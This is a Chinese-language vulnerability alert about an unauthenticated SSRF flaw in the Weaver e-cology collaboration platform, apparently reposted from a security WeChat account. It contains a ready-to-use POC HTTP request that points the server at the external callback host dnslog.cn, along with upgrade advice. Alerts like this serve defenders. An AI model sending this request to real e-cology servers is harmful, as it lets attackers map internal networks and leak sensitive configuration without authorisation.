泛微E-Cology SSRF漏洞

admin

138718
文章

114
评论

2024年7月20日12:41:06评论28 views字数 742阅读2分28秒阅读模式

0x00 漏洞编号

暂无

0x01 危险等级

高危

0x02 漏洞概述

泛微协同管理应用平台（e-cology）是一套兼具企业信息门户、知识管理、数据中心、工作流管理、人力资源管理、客户与合作伙伴管理、项目管理、财务管理、资产管理功能的协同商务平台。

泛微E-Cology SSRF漏洞

0x03 漏洞详情

漏洞类型：SSRF

影响：获取敏感信息

简述：泛微E-cology存在SSRF漏洞，未经身份验证的远程攻击者可以利用此漏洞扫描服务器所在的内网或本地端口，获取服务的banner信息，窥探网络结构，甚至对内网或本地运行的应用程序发起攻击，获取服务器内部敏感配置，造成信息泄露。

0x04 影响版本

泛微e-cology

0x05 POC

POST /api/doc/mobile/fileview/getFileViewUrl HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Content-Type: application/jsonUpgrade-Insecure-Requests: 1{    "file_id": "1000",    "file_name": "c",    "download_url":"http://dnslog.cn"}

0x06 修复建议

目前官方已发布漏洞修复版本，建议用户升级到安全版本：

https://www.weaver.com.cn/

原文始发于微信公众号（浅安安全）：漏洞预警 | 泛微E-Cology SSRF漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

泛微E-Cology SSRF漏洞

暂无

Sapido RB- 1732 路由器命令执行漏洞

【高危漏洞】Windows 11：300毫秒即可提权至管理员

NetMizer日志管理系统远程命令执行漏洞

科拓全智能停车收费系统SQL注入漏洞

漏洞复现 || Vite import存在任意文件读取漏洞

Argo Events权限管理不当漏洞

Oracle E-Business Suite远程代码执行漏洞(CVE-2025-30727)

Apache Roller 漏洞让攻击者获得未经授权的访问

Oracle E-Business Suite远程代码执行漏洞（CVE-2025-30727）

Apache Roller 未经授权的访问漏洞

发表评论

在线咨询

微信